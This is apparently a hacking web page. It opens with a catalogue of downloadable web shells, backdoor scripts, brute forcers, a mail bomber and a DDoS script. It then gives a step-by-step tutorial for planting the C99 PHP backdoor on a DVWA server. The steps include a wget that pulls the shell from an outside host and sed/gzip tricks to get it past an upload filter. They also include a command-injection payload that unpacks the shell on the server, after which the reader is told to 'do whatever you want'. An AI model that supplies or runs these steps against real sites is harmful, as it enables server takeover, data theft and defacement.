- Added 14 May 2015 » Sokot Security Team Web-based file manager
- Added 14 May 2015 » 404 shell code
- Added 28 Apr 2015 » WHMCS Killer source code
- Added 28 Apr 2015 » Komut Shell
- Added 28 Apr 2015 » Bypass Shell source code
- Added 28 Apr 2015 » Shell Uploader source code
- Added 27 Apr 2015 » VBA Shell Forcer
- Added 27 Apr 2015 » C# Shell SQL tool
- Added 31 Mar 2014 » Madspot shell script
- Added 31 Mar 2014 » ASPXSpy shell script
- Added 01 Mar 2014 » Saudi Sh3ll v1.0 Script
- Added 01 Mar 2014 » K2LL33D shell script
- Added 01 Mar 2014 » Fi73 M4n4g3r script
- Added 01 Mar 2014 » FastUnix Mailer script
- Added 01 Mar 2014 » eX MFTeaM 2009 shell
- Added 01 Mar 2014 » beleberda uploader script
- Added 01 Mar 2014 » 302 S*hell script
- Added 19 Feb 2014 » xML Shell
- Added 19 Feb 2014 » Storm7Shell Script
- Added 19 Feb 2014 » SpyShell Script
- Added 19 Feb 2014 » SimAttacker Shell
- Added 19 Feb 2014 » PHPJackal Shell
- Added 19 Feb 2014 » Pekalongan Cyber Shell
- Added 19 Feb 2014 » I-47 shell
- Added 19 Feb 2014 » Facebook Bruceforcer Script
- Added 19 Feb 2014 » Entrika upload shell
- Added 19 Feb 2014 » EgY_SpIdEr Shell
- Added 14 Feb 2014 » X-73 Code Uploader
- Added 14 Feb 2014 » Antichat Shell
- Added 13 Feb 2014 » Emailer script
- Added 13 Feb 2014 » cPanel Turbo Force v3
- Added 13 Feb 2014 » 1n73ction Shell
- Added 12 Feb 2014 » Symlink_Sa 2.0 Shell
- Added 12 Feb 2014 » Robot Pirates Property Shell
- Added 12 Feb 2014 » GNY Shell
- Added 12 Feb 2014 » Dhanush Shell
- Added 12 Feb 2014 » c99madshell Script
- Added 12 Feb 2014 » aLeRHaB ALsauDi Group Upload Script
- Added 11 Feb 2014 » WSO 2.1 Web Shell
- Added 11 Feb 2014 » Script Upload By QtRoNiX HaCkEr
- Added 11 Feb 2014 » K4C3 Undetected Shell (encrypted)
- Added 11 Feb 2014 » CYBERDARK Shell
- Added 11 Feb 2014 » Baronexco shell
- Added 11 Feb 2014 » b374k Backdoor Script
- Added 10 Feb 2014 » XgroupVn Shell (encrypted)
- Added 10 Feb 2014 » Web Shell b374k
- Added 10 Feb 2014 » Unknown Shell Script (encrypted)
- Added 10 Feb 2014 » The Acid Shell
- Added 10 Feb 2014 » Suram-Crew Private Backdoor Script (encrypted)
- Added 10 Feb 2014 » snoop Shell (encrypted)
- Added 10 Feb 2014 » SnIpEr_SA Shell
- Added 10 Feb 2014 » r57 Shell (encrypted)
- Added 10 Feb 2014 » PhpConfigSpy
- Added 10 Feb 2014 » PHP Anonymous Emailer/Mail Bomber
- Added 10 Feb 2014 » payme shell (encrypted)
- Added 10 Feb 2014 » H4 Shell (encrypted)
- Added 10 Feb 2014 » c99 Shell (updated version)
- Added 10 Feb 2014 » BoffMax Web Shell (encrypted)
- Added 10 Feb 2014 » Black-ID Web Shell (encrypted)
- Added 10 Feb 2014 » Ali Attacker Hack Script
- Added 09 Feb 2014 » PentaSec Shell (encrypted)
- Added 09 Feb 2014 » OPeNHaxshell Script
- Added 09 Feb 2014 » FilesMan Shell (encrypted)
- Added 09 Feb 2014 » FilesMan Shell (decrypted)
- Added 28 Jan 2014 » Tryagshell v1.3 (decrypted)
- Added 28 Jan 2014 » n3tshell by ibllezboy (encrypted)
- Added 28 Jan 2014 » Locus7s Shell
- Added 28 Jan 2014 » enitan AKA virus
- Added 28 Jan 2014 » C102 Shell (encrypted)
- Added 28 Jan 2014 » C102 Shell
- Added 26 Jan 2014 » Tryagshell v1.3 (encrypted)
- Added 26 Jan 2014 » Tiga-Lima remote shell
- Added 25 Jan 2014 » VB Script
- Added 25 Jan 2014 » Uploader Script
- Added 25 Jan 2014 » Tiga-Lima Shell Script
- Added 25 Jan 2014 » Random Shell Script
- Added 25 Jan 2014 » N3tShell v. Emp3ror Undetectable #18 (encrypted)
- Added 25 Jan 2014 » Mr.HiTman shell script (encrypted)
- Added 25 Jan 2014 » g00nshell v1.3
- Added 25 Jan 2014 » FaTaLisTiCz_Fx Fx29 Shell
- Added 24 Jan 2014 » DDoS script
- Added 24 Jan 2014 » C999 shell
- Added 24 Jan 2014 » c99 shell (encrypted)
- Added 24 Jan 2014 » C99 shell
A Web shell is executable code running on a server that gives an attacker remote access to functions of the server. A Web shell can also be seen as a type of Remote Access Tool (RAT) or backdoor Trojan file. Web shells can be written in any language that a server supports and some of the most common are PHP and.NET languages. How to Upload C99.php (Shell) Backdoor? As you know guys - Websites don't allow us to upload PHP file on their server, so simply hackers uses many ways to upload Shell on Server & if once shell uploaded - then complete website, Server, Database will be hacked.
Here you go with another GREAT TUTORIAL ;)!
---
Requirements: .
![Shell Shell](/uploads/1/1/8/8/118821907/373958368.jpg)
- Backtrack 4 or higher version or (Kali Linux)
- Brain
How to Upload C99.php (Shell) Backdoor ?
As you know guys - Websites don't allow us to upload PHP file on their server, so simply hackers uses many ways to upload Shell on Server & if once shell uploaded - then complete website, Server, Database will be hacked. Commonly hackers uses different types of Vulnerabilities in websites to upload Shell such as Command Execution, XSS, SQL Injection, LFI, RFI upload vulnerability. So here today m gonna show you simple tutorial - How can you upload C99shell PHP backdoor on Website server using Command Execution and Upload Vulnerability. Please use OWASP BWA or DVWA Penetration testing lab. So Enjoy it.
![Download Download](/uploads/1/1/8/8/118821907/281601344.png)
Steps to Hack:
1. Start your DVWA, Keep security on 'Low' level & Click on Upload.
2. Okay, now m using Backtrack 5- I'll also recommend you to use same OS.
3. Start Backtrack Terminal, and type mkdir -p /root/backdoorhit Enter Again type cd /root/backdoor& Hit Enter.
4. Now, it's time to download PHP Backdoor, type :
- wget http://r57.gen.tr/shell/c99.rar(Hit Enter) & wait until it downloads C99.rar, Okay..! it's downloaded
- Once again type ls -l c99.rar Hit Enter.
4. Okay - now we've to convert it into .gz & edit C99.php file to be executed
5. Go through below all commands :
- unrar x c99.rar (Hit Enter)
- cp c99.php c99.php.bkp (Hit Enter)
- head -1 c99.php (Hit Enter)
- sed -i '1 s/^.*$/<?php/g' c99.php (Hit Enter)
- head -1 c99.php (Hit Enter)
- gzip c99.php (Hit Enter)
- ls -l (Hit Enter)
6. Click on Below Image to Enlarge it & See commands :
7. You can see it in root folder we got new compressed c99.php.gz
8. Come-on back to DVWA - Upload and upload c99.php.gz file, simply we
can't upload C99.php shell so we'll use evil mind.
Click on Image to Enlarge it
9. Now, locate that file into web browser - Basically it will be at this location.
- YOUR_DVWA_IP_ADDRESS/dvwa/hackable/uploads
- Replace Green text with your DVWA lab IP Address as mine is :
- http://192.168.32.128/dvwa/hackable/uploads
10. Well, it will not work until we get .php file so now the next target is to
unzip that file and extract it into server. it's pretty cool : we'll use Command Execution techniques to Hack Website.
11. What is Command Execution : Command Execution is one of the most dangerous vulnerability that allows an attacker to send unwanted commands to web server and compromise server,database and files. It can also lead to Website Defacement, MySQL Shutdown, File Upload Vulnerabilities, Creating multiple vulnerabilities.
12. So today we gonna execute our command on web server to unzip our file and finally we're done. Okay..! let's hack.
13. Click on Command Execution DVWA : & Send below command to Server :
- YOUR_DVWA_IP; /bin/gunzip -v ../ ../hackable/uploads/c99.php
- Replace Green text with your DVWA IP as mine is:
- 192.168.32.128; /bin/gunzip -v ../ ../hackable/uploads/c99.php
- And Click on Submit.
14. Well, now you'll get successfully message as shown in the below Image.
Click on Image to Enlarge it
15. Okay! now once again locate upload directory, & you'll see that your compressed file in uncompressed. COOL.! Command Execution Rocks.
Click on Image to Enlarge it
16.Ok Click on it and you're done. Now complete Database, Server, Website, files, and all control is in your hand. Now do whatever you want to.
C99 Backdoor Web Shell Login
For Educational Purposes only, I am not responsible for your loss